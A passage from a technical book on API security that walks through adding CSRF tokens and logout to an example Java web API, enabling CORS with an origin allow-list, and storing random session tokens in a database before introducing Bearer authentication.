document.cookie field that stores all cookies as a semicolon-separated string. Many
JavaScript frameworks include convenience functions for parsing this cookie string,
but you can do it manually with code like the following that splits the string on semi-
colons, then splits each individual cookie by equals sign to separate the cookie name
from its value. Finally, URL-decode each component and check if the cookie with the
given name exists:
function getCookie(cookieName) {
    // Split the cookie string into individual cookies, then split
    // each cookie into name and value parts.
    var cookieValue = document.cookie.split(';')
        .map(item => item.split('=')
            .map(x => decodeURIComponent(x.trim())))   // Decode each part.
        .filter(item => item[0] === cookieName)[0];    // Find the cookie with the given name.
    if (cookieValue) {
        return cookieValue[1];
    }
}

You can use this helper function to update the Create Space page to submit the CSRF token with each request. Open the natter.js file in your editor and add the getCookie function. Then update the createSpace function to extract the CSRF token from the cookie and include it as an extra header on the request, as shown in listing 4.16. As a convenience, you can also update the code to check for a 401 response from the API request and redirect to the login page in that case. Save the file and rebuild the API, and you should now be able to log in and create a space through the UI.

Listing 4.16 Adding the CSRF token to requests

function createSpace(name, owner) {
    let data = {name: name, owner: owner};

    // Extract the CSRF token from the cookie.
    let csrfToken = getCookie('csrfToken');

    fetch(apiUrl + '/spaces', {
        method: 'POST',
        credentials: 'include',
        body: JSON.stringify(data),
        headers: {
            'Content-Type': 'application/json',
            // Include the CSRF token as the X-CSRF-Token header.
            'X-CSRF-Token': csrfToken
        }
    })
    .then(response => {
        if (response.ok) {
            return response.json();
        } else if (response.status === 401) {
            // If you receive a 401 response, then redirect to the login page.
            window.location.replace('/login.html');
        } else {
            throw Error(response.statusText);
        }
    })
    .then(json => console.log('Created space: ', json.name, json.uri))
    .catch(error => console.error('Error: ', error));
}
4.6 Implementing logout
Imagine you’ve logged into Natter from a shared computer, perhaps while visiting
your friend Amit’s house. After you’ve posted your news, you’d like to be able to log
out so that Amit can’t read your private messages. After all, the inability to log out was
one of the drawbacks of HTTP Basic authentication identified in section 4.2.3. To
implement logout, it’s not enough to just remove the cookie from the user’s browser
(although that’s a good start). The cookie should also be invalidated on the server in
case removing it from the browser fails for any reason3 or if the cookie may be
retained by a badly configured network cache or other faulty component.
To implement logout, you can add a new method to the TokenStore interface,
allowing a token to be revoked. Token revocation ensures that the token can no longer
be used to grant access to your API, and typically involves deleting it from the server-
side store. Open TokenStore.java in your editor and add a new method declaration
for token revocation next to the existing methods to create and read a token:
String create(Request request, Token token);
Optional<Token> read(Request request, String tokenId);
void revoke(Request request, String tokenId);   // New method to revoke a token

You can implement token revocation for session cookies by simply calling the session.invalidate() method in Spark. This will remove the session token from the backend store and add a new Set-Cookie header on the response with an expiry time in the past. This will cause the browser to immediately delete the existing cookie. Open CookieTokenStore.java in your editor and add the new revoke method shown in listing 4.17. Although it is less critical on a logout endpoint, you should enforce CSRF defenses here too, to prevent an attacker maliciously logging out your users to annoy them. To do this, verify the SHA-256 anti-CSRF token just as you did in section 4.4.3.

Listing 4.17 Revoking a session cookie

@Override
public void revoke(Request request, String tokenId) {
    var session = request.session(false);
    if (session == null) return;

    // Verify the anti-CSRF token as before.
    var provided = Base64url.decode(tokenId);
    var computed = sha256(session.id());
    if (!MessageDigest.isEqual(computed, provided)) {
        return;
    }

    // Invalidate the session cookie.
    session.invalidate();
}
You can now wire up a new logout endpoint. In keeping with our REST-like approach,
you can implement logout as a DELETE request to the /sessions endpoint. If clients
send a DELETE request to /sessions/xyz, where xyz is the token ID, then the token
may be leaked in either the browser history or in server logs. While this may not be a
problem for a logout endpoint because the token will be revoked anyway, you should
avoid exposing tokens directly in URLs like this. So, in this case, you’ll implement
logout as a DELETE request to the /sessions endpoint (with no token ID in the
URL) and the endpoint will retrieve the token ID from the X-CSRF-Token header
instead. While there are ways to make this more RESTful, we will keep it simple in this
chapter. Listing 4.18 shows the new logout endpoint that retrieves the token ID from
the X-CSRF-Token header and then calls the revoke endpoint on the TokenStore.
Open TokenController.java in your editor and add the new method.
Listing 4.18 The logout endpoint

public JSONObject logout(Request request, Response response) {
    // Get the token ID from the X-CSRF-Token header.
    var tokenId = request.headers("X-CSRF-Token");
    if (tokenId == null)
        throw new IllegalArgumentException("missing token header");

    // Revoke the token.
    tokenStore.revoke(request, tokenId);

    // Return a success response.
    response.status(200);
    return new JSONObject();
}

Now open Main.java in your editor and add a mapping for the logout endpoint to be called for DELETE requests to the /sessions endpoint:

post("/sessions", tokenController::login);
delete("/sessions", tokenController::logout);   // The new logout route
Calling the logout endpoint with a genuine session cookie and CSRF token results in
the cookie being invalidated and subsequent requests with that cookie are rejected. In
this case, Spark doesn’t even bother to delete the cookie from the browser, relying
purely on server-side invalidation. Leaving the invalidated cookie on the browser is
harmless.
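For example, reusing the cookie jar and CSRF token from section 4.4.3 (your token value will differ), a logout request looks something like this:

$ curl -i -b /tmp/cookies -X DELETE \
  -H 'X-CSRF-Token: gB7CiKkxx0FFsR4lhV9hsvA1nyT7Nw5YkJw_ysMm6ic' \
  https://localhost:4567/sessions
HTTP/1.1 200 OK
…
{}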
Answers to pop quiz questions

1. d. The protocol, hostname, and port must all exactly match. The path part of a URI is ignored by the SOP. The default port for HTTP URIs is 80 and is 443 for HTTPS.
2. e. To avoid session fixation attacks, you should invalidate any existing session cookie after the user authenticates to ensure that a fresh session is created.
3. b. The HttpOnly attribute prevents cookies from being accessible to JavaScript.
4. a, c, e. Recall from section 4.4.1 that only the registerable domain is considered for SameSite cookies (example.com in this case). The protocol, port, and path are not significant.
5. c. An attacker may be able to overwrite the cookie with a predictable value using XSS, or if they compromise a sub-domain of your site. Hash-based values are not in themselves any less guessable than any other value, and timing attacks can apply to any solution.
Summary

- HTTP Basic authentication is awkward for web browser clients and has a poor user experience. You can use token-based authentication to provide a more natural login experience for these clients.
- For web-based clients served from the same site as your API, session cookies are a simple and secure token-based authentication mechanism.
- Session fixation attacks occur if the session cookie doesn't change when a user authenticates. Make sure to always invalidate any existing session before logging the user in.
- CSRF attacks can allow other sites to exploit session cookies to make requests to your API without the user's consent. Use SameSite cookies and the hash-based double-submit cookie pattern to eliminate CSRF attacks.
5 Modern token-based authentication

This chapter covers
- Supporting cross-domain web clients with CORS
- Storing tokens using the Web Storage API
- The standard Bearer HTTP authentication scheme for tokens
- Hardening database token storage

With the addition of session cookie support, the Natter UI has become a slicker user experience, driving adoption of your platform. Marketing has bought a new domain name, nat.tr, in a doomed bid to appeal to younger users. They are insisting that logins should work across both the old and new domains, but your CSRF protections prevent the session cookies being used on the new domain from talking to the API on the old one. As the user base grows, you also want to expand to include mobile and desktop apps. Though cookies work great for web browser clients, they are less natural for native apps because the client typically must manage them itself. You need to move beyond cookies and consider other ways to manage token-based authentication.

In this chapter, you'll learn about alternatives to cookies using HTML 5 Web Storage and the standard Bearer authentication scheme for token-based authentication. You'll enable cross-origin resource sharing (CORS) to allow cross-domain requests from the new site.

DEFINITION Cross-origin resource sharing (CORS) is a standard to allow some cross-origin requests to be permitted by web browsers. It defines a set of headers that an API can return to tell the browser which requests should be allowed.

Because you'll no longer be using the built-in cookie storage in Spark, you'll develop secure token storage in the database and see how to apply modern cryptography to protect tokens from a variety of threats.
5.1 Allowing cross-domain requests with CORS
To help Marketing out with the new domain name, you agree to investigate how you
can let the new site communicate with the existing API. Because the new site has a dif-
ferent origin, the same-origin policy (SOP) you learned about in chapter 4 throws up
several problems for cookie-based authentication:

- Attempting to send a login request from the new site is blocked because the JSON Content-Type header is disallowed by the SOP.
- Even if you could send the request, the browser will ignore any Set-Cookie headers on a cross-origin response, so the session cookie will be discarded.
- You also cannot read the anti-CSRF token, so you cannot make requests from the new site even if the user is already logged in.
Moving to an alternative token storage mechanism solves only the second issue, but if
you want to allow cross-origin requests to your API from browser clients, you’ll need to
solve the others. The solution is the CORS standard, introduced in 2013 to allow the
SOP to be relaxed for some cross-origin requests.
There are several ways to simulate cross-origin requests on your local development
environment, but the simplest is to just run a second copy of the Natter API and UI on
a different port. (Remember that an origin is the combination of protocol, host name, and
port, so a change to any of these will cause the browser to treat it as a separate origin.)
To allow this, open Main.java in your editor and add the following line to the top of
the method before you create any routes to allow Spark to use a different port:
port(args.length > 0 ? Integer.parseInt(args[0])
: spark.Service.SPARK_DEFAULT_PORT);
You can now start a second copy of the Natter UI by running the following command:
mvn clean compile exec:java -Dexec.args=9999
If you now open your web browser and navigate to https:/ /localhost:9999/natter.html,
you’ll see the familiar Natter Create Space form. Because the port is different and
Natter API requests violate the SOP, this will be treated as a separate origin by the
browser, so any attempt to create a space or login will be rejected, with a cryptic error
message in the JavaScript console about being blocked by CORS policy (figure 5.1).
You can fix this by adding CORS headers to the API responses to explicitly allow some cross-origin requests.

Figure 5.1 An example of a CORS error when trying to make a cross-origin request that violates the same-origin policy
5.1.1 Preflight requests
Before CORS, browsers blocked requests that violated the SOP. Now, the browser
makes a preflight request to ask the server of the target origin whether the request
should be allowed, as shown in figure 5.2.
DEFINITION
A preflight request occurs when a browser would normally block
the request for violating the same-origin policy. The browser makes an HTTP
OPTIONS request to the server asking if the request should be allowed. The
server can either deny the request or else allow it with restrictions on the
allowed headers and methods.
The browser first makes an HTTP OPTIONS request to the target server. It includes the origin of the script making the request as the value of the Origin header, along with headers indicating the HTTP method of the request that was attempted (the Access-Control-Request-Method header) and any nonstandard headers that were in the original request (Access-Control-Request-Headers).
The server responds by sending back a response with headers to indicate which
cross-origin requests it considers acceptable. If the original request does not match
the server’s response, or the server does not send any CORS headers in the response,
then the browser blocks the request. If the original request is allowed, the API can also
set CORS headers in the response to that request to control how much of the
response is revealed to the client. An API might therefore agree to allow cross-origin
requests with nonstandard headers but prevent the client from reading the response.
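As a concrete illustration (with hypothetical origin, host, and path values), a successful preflight exchange looks something like this:

OPTIONS /spaces HTTP/1.1
Host: api.example.com
Origin: https://www.example.org
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Content-Type, X-CSRF-Token

HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://www.example.org
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, DELETE
Access-Control-Allow-Headers: Content-Type, Authorization, X-CSRF-Token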
Figure 5.2 When a script tries to make a cross-origin request that would be blocked by the SOP, the browser makes a CORS preflight request to the target server to ask if the request should be permitted. If the server agrees, and any conditions it specifies are satisfied, then the browser makes the original request and lets the script see the response. Otherwise, the browser blocks the request.
5.1.2 CORS headers
The CORS headers that the server can send in the response are summarized in table 5.1. You can learn more about CORS headers from Mozilla's excellent article at https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS. The Access-Control-Allow-Origin and Access-Control-Allow-Credentials headers can be sent in the response to the preflight request and in the response to the actual request, whereas most of the other headers are sent only in response to the preflight request. This is indicated after each header name below, where "Actual" means the header can be sent in response to the actual request, "Preflight" means it can be sent only in response to a preflight request, and "Both" means it can be sent on either.

TIP If you return a specific allowed origin in the Access-Control-Allow-Origin response header, then you should also include a Vary: Origin header to ensure the browser and any network proxies only cache the response for this specific requesting origin.

Table 5.1 CORS response headers

Access-Control-Allow-Origin (Both)
    Specifies a single origin that should be allowed access, or else the wildcard * that allows access from any origin.

Access-Control-Allow-Headers (Preflight)
    Lists the non-simple headers that can be included on cross-origin requests to this server. The wildcard value * can be used to allow any headers.

Access-Control-Allow-Methods (Preflight)
    Lists the HTTP methods that are allowed, or the wildcard * to allow any method.

Access-Control-Allow-Credentials (Both)
    Indicates whether the browser should include credentials on the request. Credentials in this case means browser cookies, saved HTTP Basic/Digest passwords, and TLS client certificates. If set to true, then none of the other headers can use a wildcard value.

Access-Control-Max-Age (Preflight)
    Indicates the maximum number of seconds that the browser should cache this CORS response. Browsers typically impose a hard-coded upper limit on this value of around 24 hours or less (Chrome currently limits this to just 10 minutes). This only applies to the allowed headers and allowed methods.

Access-Control-Expose-Headers (Actual)
    Only a small set of basic headers are exposed from the response to a cross-origin request by default. Use this header to expose any nonstandard headers that your API returns in responses.
Because the Access-Control-Allow-Origin header allows only a single value to be speci-
fied, if you want to allow access from more than one origin, then your API server
needs to compare the Origin header received in a request against an allowed set and,
if it matches, echo the origin back in the response. If you read about Cross-Site Script-
ing (XSS) and header injection attacks in chapter 2, then you may be worried about
reflecting a request header back in the response. But in this case, you do so only after
an exact comparison with a list of trusted origins, which prevents an attacker from
including untrusted content in that response.
5.1.3 Adding CORS headers to the Natter API
Armed with your new knowledge of how CORS works, you can now add appropriate
headers to ensure that the copy of the UI running on a different origin can access the
API. Because cookies are considered a credential by CORS, you need to return an
Access-Control-Allow-Credentials: true header from preflight requests; other-
wise, the browser will not send the session cookie. As mentioned in the last section,
this means that the API must return the exact origin in the Access-Control-Allow-
Origin header and cannot use any wildcards.
TIP
Browsers will also ignore any Set-Cookie headers in the response to a CORS
request unless the response contains Access-Control-Allow-Credentials:
true. This header must therefore be returned on responses to both preflight
requests and the actual request for cookies to work. Once you move to non-
cookie methods later in this chapter, you can remove these headers.
CORS and SameSite cookies

SameSite cookies, described in chapter 4, are fundamentally incompatible with CORS. If a cookie is marked as SameSite, then it will not be sent on cross-site requests regardless of any CORS policy, and the Access-Control-Allow-Credentials header is ignored. An exception is made for origins that are sub-domains of the same site; for example, www.example.com can still send requests to api.example.com, but genuine cross-site requests to different registerable domains are disallowed. If you need to allow cross-site requests with cookies, then you should not use SameSite cookies.

A complication came in October 2019, when Google announced that its Chrome web browser would start marking all cookies as SameSite=lax by default with the release of Chrome 80 in February 2020. (At the time of writing, the rollout of this change has been temporarily paused due to the COVID-19 coronavirus pandemic.) If you wish to use cross-site cookies, you must now explicitly opt out of SameSite protections by adding the SameSite=none and Secure attributes to those cookies, but this can cause problems in some web browsers (see https://www.chromium.org/updates/same-site/incompatible-clients). Google, Apple, and Mozilla are all becoming more aggressive in blocking cross-site cookies to prevent tracking and other security or privacy issues. It's clear that the future of cookies will be restricted to HTTP requests within the same site and that alternative approaches, such as those discussed in the rest of this chapter, must be used for all other cases.

To add CORS support, you'll implement a simple filter that lists a set of allowed origins, shown in listing 5.1. For all requests, if the Origin header in the request is in the allowed list, then you should set the basic Access-Control-Allow-Origin and Access-Control-Allow-Credentials headers. If the request is a preflight request, then it can be terminated immediately using the Spark halt() method, because no further processing is required. Although no specific status codes are required by CORS, it is recommended to return a 403 Forbidden error for preflight requests from unauthorized origins, and a 204 No Content response for successful preflight requests.

You should add CORS headers for any headers and request methods that your API requires on any endpoint. Because CORS responses relate to a single request, you could vary the response for each API endpoint, but this is rarely done. The Natter API supports GET, POST, and DELETE requests, so you should list those. You also need to list the Authorization header for login to work, and the Content-Type and X-CSRF-Token headers for normal API calls to function.

For non-preflight requests, you can let the request proceed once you have added the basic CORS response headers. To add the CORS filter, navigate to src/main/java/com/manning/apisecurityinaction and create a new file named CorsFilter.java in your editor. Type in the contents of listing 5.1, and click Save.

Listing 5.1 CORS filter

package com.manning.apisecurityinaction;

import spark.*;
import java.util.*;

import static spark.Spark.*;

class CorsFilter implements Filter {
    private final Set<String> allowedOrigins;

    CorsFilter(Set<String> allowedOrigins) {
        this.allowedOrigins = allowedOrigins;
    }

    @Override
    public void handle(Request request, Response response) {
        var origin = request.headers("Origin");

        // If the origin is allowed, then add the basic CORS
        // headers to the response.
        if (origin != null && allowedOrigins.contains(origin)) {
            response.header("Access-Control-Allow-Origin", origin);
            response.header("Access-Control-Allow-Credentials",
                    "true");
            response.header("Vary", "Origin");
        }

        if (isPreflightRequest(request)) {
            // If the origin is not allowed, then reject the
            // preflight request.
            if (origin == null || !allowedOrigins.contains(origin)) {
                halt(403);
            }
            response.header("Access-Control-Allow-Headers",
                    "Content-Type, Authorization, X-CSRF-Token");
            response.header("Access-Control-Allow-Methods",
                    "GET, POST, DELETE");
            // For permitted preflight requests, return a
            // 204 No Content status.
            halt(204);
        }
    }

    // Preflight requests use the HTTP OPTIONS method and include
    // the CORS request method header.
    private boolean isPreflightRequest(Request request) {
        return "OPTIONS".equals(request.requestMethod()) &&
                request.headers().contains("Access-Control-Request-Method");
    }
}
To enable the CORS filter, you need to add it to the main method as a Spark before()
filter, so that it runs before the request is processed. CORS preflight requests should
be handled before your API requests authentication because credentials are never
sent on a preflight request, so it would always fail otherwise. Open the Main.java file in
your editor (it should be right next to the new CorsFilter.java file you just created) and
find the main method. Add the following call to the main method right after the rate-
limiting filter that you added in chapter 3:
var rateLimiter = RateLimiter.create(2.0d);

// The existing rate-limiting filter
before((request, response) -> {
    if (!rateLimiter.tryAcquire()) {
        halt(429);
    }
});

// The new CORS filter
before(new CorsFilter(Set.of("https://localhost:9999")));
This ensures the new UI server running on port 9999 can make requests to the API.
If you now restart the API server on port 4567 and retry making requests from the
alternative UI on port 9999, you’ll be able to login. However, if you now try to create
a space, the request is rejected with a 401 response and you’ll end up back at the
login page!
TIP
You don’t need to list the original UI running on port 4567, because this
is served from the same origin as the API and won’t be subject to CORS
checks by the browser.
The reason why the request is blocked is due to another subtle detail when enabling
CORS with cookies. In addition to the API returning Access-Control-Allow-Credentials
on the response to the login request, the client also needs to tell the browser that it
expects credentials on the response. Otherwise the browser will ignore the Set-Cookie
header despite what the API says. To allow cookies in the response, the client must set
the credentials field on the fetch request to include. Open the login.js file in your
editor and change the fetch request in the login function to the following. Save the
file and restart the UI running on port 9999 to test the changes:
fetch(apiUrl + '/sessions', {
    method: 'POST',
    // Set the credentials field to "include" to allow the API
    // to set cookies on the response.
    credentials: 'include',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': credentials
    }
})

If you now log in again and repeat the request to create a space, it will succeed because the cookie and CSRF token are finally present on the request.

Pop quiz

1. Given a single-page app running at https://www.example.com/app and a cookie-based API login endpoint at https://api.example.net/login, what CORS headers in addition to Access-Control-Allow-Origin are required to allow the cookie to be remembered by the browser and sent on subsequent API requests?
   a. Access-Control-Allow-Credentials: true only on the actual response.
   b. Access-Control-Expose-Headers: Set-Cookie on the actual response.
   c. Access-Control-Allow-Credentials: true only on the preflight response.
   d. Access-Control-Expose-Headers: Set-Cookie on the preflight response.
   e. Access-Control-Allow-Credentials: true on the preflight response and Access-Control-Allow-Credentials: true on the actual response.

The answer is at the end of the chapter.

5.2 Tokens without cookies
With a bit of hard work on CORS, you’ve managed to get cookies working from the
new site. Something tells you that the extra work you needed to do just to get cook-
ies to work is a bad sign. You’d like to mark your cookies as SameSite as a defense in
depth against CSRF attacks, but SameSite cookies are incompatible with CORS.
Apple’s Safari browser is also aggressively blocking cookies on some cross-site requests
for privacy reasons, and some users are doing this manually through browser set-
tings and extensions. So, while cookies are still a viable and simple solution for web
clients on the same domain as your API, the future looks bleak for cookies with
cross-origin clients. You can future-proof your API by moving to an alternative token
storage format.
Cookies are such a compelling option for web-based clients because they provide
the three components needed to implement token-based authentication in a neat pre-
packaged bundle (figure 5.3):
- A standard way to communicate tokens between the client and the server, in the form of the Cookie and Set-Cookie headers. Browsers will handle these headers for your clients automatically and make sure they are only sent to the correct site.
- A convenient storage location for tokens on the client that persists across page loads (and reloads) and redirections. Cookies can also survive a browser restart and can even be automatically shared between devices, such as with Apple's Handoff functionality.1
- Simple and robust server-side storage of token state, as most web frameworks support cookie storage out of the box, just like Spark.

1 https://support.apple.com/en-gb/guide/mac-help/mchl732d3c0a/mac

Figure 5.3 Cookies provide the three key components of token-based authentication: client-side token storage, server-side state, and a standard way to communicate cookies between the client and server with the Set-Cookie and Cookie headers.

To replace cookies, you'll therefore need a replacement for each of these three aspects, which is what this chapter is all about. On the other hand, cookies come with unique problems, such as CSRF attacks, that are often eliminated by moving to an alternative scheme.
5.2.1 Storing token state in a database
Now that you’ve abandoned cookies, you also lose the simple server-side storage
implemented by Spark and other frameworks. The first task then is to implement a
replacement. In this section, you’ll implement a DatabaseTokenStore that stores
token state in a new database table in the existing SQL database.
A token is a simple data structure that should be free of dependencies on other functionality in your API. Each token has a token ID and a set of attributes associated with it, including the username of the authenticated user and the expiry time of the token. A single table is enough to store this structure, as shown in listing 5.2.
The token ID, username, and expiry are represented as individual columns so that they can be indexed and searched, but any remaining attributes are stored as a JSON object serialized into a string (varchar) column. If you needed to look up tokens based on other attributes, you could extract the attributes into a separate table, but in most cases this extra complexity is not justified. Open the schema.sql file in your editor and add the table definition to the bottom. Be sure to also grant appropriate permissions to the Natter database user.

Listing 5.2 The token database schema
CREATE TABLE tokens(
    token_id VARCHAR(100) PRIMARY KEY,
    user_id VARCHAR(30) NOT NULL,     -- Link the token to the ID of the user.
    expiry TIMESTAMP NOT NULL,
    attributes VARCHAR(4096) NOT NULL -- Store the attributes as a JSON string.
);
-- Grant permissions to the Natter database user.
GRANT SELECT, INSERT, DELETE ON tokens TO natter_api_user;
With the database schema created, you can now implement the DatabaseTokenStore
to use it. The first thing you need to do when issuing a new token is to generate a fresh token ID.
Alternative token storage databases
Although the SQL database storage used in this chapter is adequate for demonstration
purposes and low-traffic APIs, a relational database may not be a perfect choice for all
deployments. Authentication tokens are validated on every request, so the cost of a
database transaction for every lookup can soon add up. On the other hand, tokens are
usually extremely simple in structure, so they don’t need a complicated database
schema or sophisticated integrity constraints. At the same time, token state rarely
changes after a token has been issued, and a fresh token should be generated when-
ever any security-sensitive attributes change to avoid session fixation attacks. This
means that many uses of tokens are also largely unaffected by consistency worries.
For these reasons, many production implementations of token storage opt for non-relational database backends, such as the Redis in-memory key-value store (https://redis.io), or a NoSQL JSON store that emphasizes speed and availability.
Whichever database backend you choose, you should ensure that it respects consis-
tency in one crucial aspect: token deletion. If a token is deleted due to a suspected
security breach, it should not come back to life later due to a glitch in the database.
The Jepsen project (https://jepsen.io/analyses) provides detailed analysis and test-
ing of the consistency properties of many databases.
You shouldn't use a normal database sequence for this, because token IDs must be unguessable for an attacker. Otherwise, an attacker can simply wait for another user to log in and then guess the ID of their token to hijack their session. IDs generated by database sequences tend to be extremely predictable, often just a simple incrementing integer value. To be secure, a token ID should be generated with a high degree of entropy from a cryptographically-secure random number generator (RNG). In Java, this means the random data should come from a SecureRandom object. In other languages, you should read random data from /dev/urandom on Linux, or use an appropriate operating system call such as getrandom(2) on Linux or RtlGenRandom() on Windows.
DEFINITION In information security, entropy is a measure of how likely it is that a random variable has a given value. When a variable is said to have 128 bits of entropy, that means that there is a 1 in 2^128 chance of it having one specific value rather than any other value. The more entropy a variable has, the more difficult it is to guess what value it has. For long-lived values that should be unguessable by an adversary with access to large amounts of computing power, an entropy of 128 bits is a secure minimum. If your API issues a very large number of tokens with long expiry times, then you should consider a higher entropy of 160 bits or more. For short-lived tokens and an API with rate-limiting on token validation requests, you could reduce the entropy to reduce the token size, but this is rarely worth it.
What if I run out of entropy?
It is a persistent myth that operating systems can somehow run out of entropy if you read too much from the random device. This often leads developers to come up with elaborate and unnecessary workarounds. In the worst cases, these workarounds dramatically reduce the entropy, making token IDs predictable. Generating cryptographically-secure random data is a complex topic and not something you should attempt to do yourself. Once the operating system has gathered around 256 bits of random data, from interrupt timings and other low-level observations of the system,
it can happily generate strongly unpredictable data until the heat death of the universe. There are two general exceptions to this rule:
- When the operating system first starts, it may not have gathered enough entropy and so values may be temporarily predictable. This is generally only a concern to kernel-level services that run very early in the boot sequence. The Linux getrandom() system call will block in this case until the OS has gathered enough entropy.
- When a virtual machine is repeatedly resumed from a snapshot, it will have identical internal state until the OS re-seeds the random data generator. In some cases, this may result in identical or very similar output from the random device for a short time. While a genuine problem, you are unlikely to do a better job than the OS at detecting or handling this situation.
In short, trust the OS because most OS random data generators are well-designed and do a good job of generating unpredictable output. You should avoid the /dev/random device on Linux because it doesn't generate better-quality output than /dev/urandom and may block your process for long periods of time. If you want to learn more about how operating systems generate random data securely, see chapter 9 of Cryptography Engineering by Niels Ferguson, Bruce Schneier, and Tadayoshi Kohno (Wiley, 2010).
For Natter, you'll use 160-bit token IDs generated with a SecureRandom object. First, generate 20 bytes of random data using the nextBytes() method. Then you can base64url-encode that to produce a URL-safe random string:
private String randomId() {
    // Generate 20 bytes of random data from SecureRandom.
    var bytes = new byte[20];
    new SecureRandom().nextBytes(bytes);
    // Encode the result with URL-safe Base64 encoding to create a string.
    return Base64url.encode(bytes);
}
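Twenty random bytes is 160 bits of entropy, and base64url encodes 6 bits per character, so the resulting string is ceil(160/6) = 27 characters long. The Base64url class is the small helper introduced earlier in the book; if you don't have it to hand, a minimal sketch along these lines (assuming java.util.Base64 with a no-padding URL-safe encoder; your version may differ) is enough for the listings in this chapter:

import java.util.Base64;

// Minimal sketch of a Base64url helper: URL-safe Base64 without padding.
class Base64url {
    private static final Base64.Encoder encoder =
            Base64.getUrlEncoder().withoutPadding();
    private static final Base64.Decoder decoder = Base64.getUrlDecoder();

    static String encode(byte[] data) {
        return encoder.encodeToString(data);
    }

    static byte[] decode(String encoded) {
        return decoder.decode(encoded);
    }
}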
Listing 5.3 shows the complete DatabaseTokenStore implementation. After creating a
random ID, you can serialize the token attributes into JSON and then insert the data
into the tokens table using the Dalesbred library introduced in chapter 2. Reading
the token is also simple using a Dalesbred query. A helper method can be used to con-
vert the JSON attributes back into a map to create the Token object. Dalesbred will
call the method for the matching row (if one exists), which can then perform the
JSON conversion to construct the real token. To revoke a token on logout, you can
simply delete it from the database. Navigate to src/main/java/com/manning/apisecurityinaction/token and create a new file named DatabaseTokenStore.java. Type in the contents of listing 5.3 and save the new file.

Listing 5.3 The DatabaseTokenStore
package com.manning.apisecurityinaction.token;

import org.dalesbred.Database;
import org.json.JSONObject;
import spark.Request;

import java.security.SecureRandom;
import java.sql.*;
import java.util.*;

public class DatabaseTokenStore implements TokenStore {
    private final Database database;
    private final SecureRandom secureRandom;

    public DatabaseTokenStore(Database database) {
        this.database = database;
        // Use a SecureRandom to generate unguessable token IDs.
        this.secureRandom = new SecureRandom();
    }
    private String randomId() {
        var bytes = new byte[20];
        secureRandom.nextBytes(bytes);
        return Base64url.encode(bytes);
    }

    @Override
    public String create(Request request, Token token) {
        var tokenId = randomId();
        // Serialize the token attributes as JSON.
        var attrs = new JSONObject(token.attributes).toString();

        database.updateUnique("INSERT INTO " +
            "tokens(token_id, user_id, expiry, attributes) " +
            "VALUES(?, ?, ?, ?)", tokenId, token.username,
            token.expiry, attrs);

        return tokenId;
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        return database.findOptional(this::readToken,
            "SELECT user_id, expiry, attributes " +
            "FROM tokens WHERE token_id = ?", tokenId);
    }

    // Use a helper method to reconstruct the token from the JSON attributes.
    private Token readToken(ResultSet resultSet)
            throws SQLException {
        var username = resultSet.getString(1);
        var expiry = resultSet.getTimestamp(2).toInstant();
        var json = new JSONObject(resultSet.getString(3));
        var token = new Token(expiry, username);
        for (var key : json.keySet()) {
            token.attributes.put(key, json.getString(key));
        }
        return token;
    }

    // Revoke a token on logout by deleting it from the database.
    @Override
    public void revoke(Request request, String tokenId) {
        database.update("DELETE FROM tokens WHERE token_id = ?",
            tokenId);
    }
}
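For reference, the TokenStore interface and Token class that this store implements were defined in chapter 4. Reconstructed from the calls made in the listings here (so the exact field and collection types are assumptions, not the book's verbatim code), their shape is roughly:

public interface TokenStore {
    String create(Request request, Token token);
    Optional<Token> read(Request request, String tokenId);
    void revoke(Request request, String tokenId);
}

public class Token {
    public final Instant expiry;
    public final String username;
    public final Map<String, String> attributes = new ConcurrentHashMap<>();

    public Token(Instant expiry, String username) {
        this.expiry = expiry;
        this.username = username;
    }
}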
All that remains is to plug in the DatabaseTokenStore in place of the CookieTokenStore. Open Main.java in your editor and locate the lines that create the CookieTokenStore. Replace them with code to create the DatabaseTokenStore, passing in
the Dalesbred Database object:
var databaseTokenStore = new DatabaseTokenStore(database);
TokenStore tokenStore = databaseTokenStore;
var tokenController = new TokenController(tokenStore);
Save the file and restart the API to see the new token storage format at work.
TIP
To ensure that Java uses the non-blocking /dev/urandom device for
seeding the SecureRandom class, pass the option -Djava.security.egd=file:
/dev/urandom to the JVM. This can also be configured in the java.security
properties file in your Java installation.
First create a test user, as always:
curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
Then call the login endpoint to obtain a session token:
$ curl -i -H 'Content-Type: application/json' -u test:password \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Wed, 22 May 2019 15:35:50 GMT
Content-Type: application/json
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: private, max-age=0
Server:
Transfer-Encoding: chunked
{"token":"QDAmQ9TStkDCpVK5A9kFowtYn2k"}
Note the lack of a Set-Cookie header in the response. There is just the new token in
the JSON body. One quirk is that the only way to pass the token back to the API is via
the old X-CSRF-Token header you added for cookies:
$ curl -i -H 'Content-Type: application/json' \
-H 'X-CSRF-Token: QDAmQ9TStkDCpVK5A9kFowtYn2k' \
-d '{"name":"test","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 201 Created
We’ll fix that in the next section so that the token is passed in a more appropriate header.
5.2.2 The Bearer authentication scheme
Passing the token in an X-CSRF-Token header is less than ideal for tokens that have nothing to do with CSRF. You could just rename the header, and that would be perfectly acceptable. However, a standard way to pass non-cookie-based tokens to an API
exists in the form of the Bearer token scheme for HTTP authentication defined by RFC
6750 (https://tools.ietf.org/html/rfc6750). While originally designed for OAuth2
usage (chapter 7), the scheme has been widely adopted as a general mechanism for
API token-based authentication.
DEFINITION
A bearer token is a token that can be used at an API simply by
including it in the request. Any client that has a valid token is authorized to
use that token and does not need to supply any further proof of authentication.
A bearer token can be given to a third party to grant them access without
revealing user credentials but can also be used easily by attackers if stolen.
To send a token to an API using the Bearer scheme, you simply include it in an Authorization header, much like you did with the encoded username and password for HTTP Basic authentication. The token is included without additional encoding:2

Authorization: Bearer QDAmQ9TStkDCpVK5A9kFowtYn2k

2 The syntax of the Bearer scheme allows tokens that are Base64-encoded, which is sufficient for most token formats in common use. It doesn't say how to encode tokens that do not conform to this syntax.
The standard also describes how to issue a WWW-Authenticate challenge header for
bearer tokens, which allows our API to become compliant with the HTTP specifica-
tions once again, because you removed that header in chapter 4. The challenge can
